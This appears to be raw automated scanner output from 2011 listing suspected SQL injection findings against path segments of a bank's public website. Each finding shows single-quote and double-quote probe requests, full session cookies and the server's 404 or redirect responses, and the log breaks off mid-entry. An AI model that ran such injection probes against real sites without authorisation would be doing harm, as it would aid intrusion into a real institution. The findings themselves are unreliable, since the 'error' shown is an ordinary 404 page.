The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/locator'/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:43 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/locator''/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:44 GMT location: http://www.bbt.com/bbt/locator%27%27/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 148 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/locator%27%27/default.html">here</a>.</body>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/locator/default.html' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:50 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/locator/default.html'' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:53 GMT location: http://www.bbt.com/bbt/locator/default.html%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 148 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/locator/default.html%27%27">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/mobile/mobile-product.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:36 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/mobile/mobile-product.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:36 GMT location: http://www.bbt.com/bbt/%27%27/mobile/mobile-product.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 155 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/mobile/mobile-product.html">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/mobile'/mobile-product.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:43 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/mobile''/mobile-product.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:43 GMT location: http://www.bbt.com/bbt/mobile%27%27/mobile-product.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 154 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/mobile%27%27/mobile-product.html">here</a>.</body>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/mobile/mobile-product.html' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:54 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/mobile/mobile-product.html'' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:54 GMT location: http://www.bbt.com/bbt/mobile/mobile-product.html%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 154 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/mobile/mobile-product.html%27%27">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/personal/products/checkcard/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:40 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/personal/products/checkcard/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:40 GMT location: http://www.bbt.com/bbt/%27%27/personal/products/checkcard/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 169 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/personal/products/checkcard/default.html">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/personal'/products/checkcard/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:46 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/personal''/products/checkcard/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:48 GMT location: http://www.bbt.com/bbt/personal%27%27/products/checkcard/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 168 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal%27%27/products/checkcard/default.html">here</a>.</body>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/personal/products'/checkcard/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:56 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/personal/products''/checkcard/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:57 GMT location: http://www.bbt.com/bbt/personal/products%27%27/checkcard/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 168 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal/products%27%27/checkcard/default.html">here</a>.</body>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/personal/products/checkcard'/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:49:02 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/personal/products/checkcard''/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:49:04 GMT location: http://www.bbt.com/bbt/personal/products/checkcard%27%27/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 168 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal/products/checkcard%27%27/default.html">here</a>.</body>
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/personal/products/checkcard/default.html' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:49:10 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/personal/products/checkcard/default.html'' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:49:10 GMT location: http://www.bbt.com/bbt/personal/products/checkcard/default.html%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 168 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal/products/checkcard/default.html%27%27">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/personal/products/onlinebanking/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:45 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/personal/products/onlinebanking/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
